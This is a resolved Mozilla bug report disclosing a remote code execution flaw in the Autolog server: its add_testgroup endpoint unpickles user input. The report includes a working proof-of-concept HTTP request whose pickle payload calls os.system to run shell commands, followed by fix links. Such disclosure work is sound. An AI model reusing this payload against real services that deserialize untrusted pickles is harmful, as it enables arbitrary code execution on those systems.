Closed
Bug 717118
Opened 14 years ago
Closed 14 years ago
Autolog unserializes userinput into objects allowing remote code execution in add_testgroup
Categories
(Testing Graveyard :: Autolog, defect)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: freddy, Assigned: jgriffin)
Details
(Whiteboard: [infrasec:osinject][ws:critical])
The function add_testgroup will deserialize python pickle objects from user input.
An attacker can craft his own object with arbitrary code and pickle it locally using cPickle.dumps(). This object will be created on the server side and plays by the attacker's rules.
Please do not use cPickle for data or validate intensively. Using JSON instead is highly encouraged.
Example request:
POST /autologserver/addtestgroup HTTP/1.1
Host: 10.8.73.23
Content-Length: 48
(S'sleep 5;touch PWNED'
p1
ios
system
p2
(dp3
b.
You will see that this request takes about 5 seconds.
I might have created two files, called PWNED and PWN3D for testing purposes.
|
Assignee | |
Updated•14 years ago
|
Assignee: nobody → jgriffin
|
|
Assignee | |
Comment 1•14 years ago
|
||
Fixed as http://hg.mozilla.org/automation/autolog/rev/aea2455268b4 and http://hg.mozilla.org/users/jgriffin_mozilla.com/mozautolog/rev/ea7fd762cfc2
Status: NEW → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
|
||
Updated•11 years ago
|
Product: Testing → Testing Graveyard
|
||
Updated•11 years ago
|
Group: mozilla-confidential
You need to log in
before you can comment on or make changes to this bug.
Description
•